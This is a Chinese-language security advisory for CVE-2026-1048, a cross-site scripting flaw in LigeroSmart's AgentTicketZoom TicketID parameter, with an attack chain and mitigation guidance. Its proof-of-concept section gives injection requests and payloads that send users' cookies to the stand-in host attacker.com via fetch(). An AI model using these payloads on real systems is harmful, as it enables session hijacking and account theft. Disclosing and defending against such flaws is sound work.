CVE-2026-1048: LigeroSmart AgentTicketZoom页面TicketID参数XSS漏洞

漏洞信息

漏洞编号

CVE-2026-1048

漏洞类型

跨站脚本(XSS)

CVSS评分

3.5 低危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

LigeroSmart

漏洞概述

CVE-2026-1048是LigeroSmart软件中的一个存储型跨站脚本(XSS)漏洞，存在于6.1.26及之前版本中。该漏洞位于otrs/index.pl?Action=AgentTicketZoom页面的TicketID参数处理逻辑中，攻击者可通过构造恶意Payload注入JavaScript代码。当其他用户访问包含恶意代码的工单详情页面时，注入的脚本将在受害者浏览器中执行，可能导致会话劫持、敏感信息窃取或钓鱼攻击。由于该漏洞的利用代码已在公开渠道发布，且利用复杂度较低，建议相关用户尽快采取防护措施。LigeroSmart作为OTRS(开源工单系统)的分支版本，被广泛应用于企业IT服务管理和客户支持场景，因此该漏洞可能影响大量组织的日常运营。

技术细节

该漏洞为存储型XSS(Stored XSS)漏洞，存在于LigeroSmart的AgentTicketZoom功能模块中。漏洞产生的根本原因是程序未对用户提交的TicketID参数进行充分的输入验证和输出编码。当攻击者通过URL参数TicketID注入恶意JavaScript代码(如<script>alert(document.cookie)</script>)时，该Payload会被存储在数据库中。随后，当其他用户访问该工单详情页面时，服务器从数据库取出未经过滤的数据并嵌入到HTML响应中，导致恶意脚本在受害者浏览器上下文中执行。攻击者可利用此漏洞窃取用户会话Cookie、劫持用户账号、执行任意前端操作或进行钓鱼攻击。由于CVSS评分较低(3.5)，该漏洞的机密性和完整性影响均为低级别，但仍需引起重视。

攻击链分析

STEP 1

侦察阶段

攻击者识别目标站点使用的LigeroSmart版本，确认版本低于6.1.26以确定漏洞存在性

STEP 2

Payload构造

攻击者构造包含恶意JavaScript代码的TicketID参数，如<script>标签或事件处理器属性

STEP 3

漏洞注入

通过AgentTicketZoom页面的URL参数或工单创建功能将恶意Payload提交，Payload被存储在数据库中

STEP 4

触发阶段

受害者访问包含恶意代码的工单详情页面，服务器从数据库取出未过滤的数据并返回给受害者浏览器

STEP 5

脚本执行

恶意JavaScript在受害者浏览器上下文中执行，可窃取Cookie、劫持会话或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2026-1048 PoC - LigeroSmart XSS via TicketID Parameter -->
<!-- This PoC demonstrates the stored XSS vulnerability in AgentTicketZoom -->

<!-- Method 1: Direct URL Injection -->
GET /otrs/index.pl?Action=AgentTicketZoom&TicketID=<script>alert(document.domain)</script> HTTP/1.1
Host: target.example.com
Cookie: [victim_session_cookie]

<!-- Method 2: JavaScript Payload for Cookie Theft -->
<script>
  fetch('https://attacker.com/steal?c=' + encodeURIComponent(document.cookie));
</script>

<!-- Method 3: Stored XSS via Ticket Creation -->
<!-- Attacker creates a ticket with malicious TicketID, when viewed by other users, script executes -->

<!-- Example: Create malicious ticket via LigeroSmart API -->
POST /otrs/index.pl?Action=AgentTicketZoom
Content-Type: application/x-www-form-urlencoded

TicketID=<img src=x onerror="fetch('https://attacker.com/log?cookie='+document.cookie)">

影响范围

LigeroSmart <= 6.1.26

防御指南

临时缓解措施

在官方补丁发布前，建议采取以下临时缓解措施：1)在前端和后端同时对TicketID等参数进行严格的输入验证，过滤<、>、'、"等特殊字符；2)对所有用户可控的输出点实施HTML编码；3)配置严格的Content-Security-Policy响应头；4)限制低权限用户创建和修改工单的权限；5)监控和审查日志中的可疑请求模式；6)考虑临时禁用AgentTicketZoom功能或部署WAF规则进行防护。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-1048
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-1048
3 Details https://www.cvedetails.com/cve/CVE-2026-1048/
4 VulDB https://vuldb.com/cve/CVE-2026-1048
5 Link https://github.com/LigeroSmart/ligerosmart/
6 Link https://github.com/LigeroSmart/ligerosmart/issues/279
7 Link https://github.com/LigeroSmart/ligerosmart/issues/279#issue-3775562926
8 Link https://vuldb.com/?ctiid.341600
9 Link https://vuldb.com/?id.341600
10 Link https://vuldb.com/?submit.729399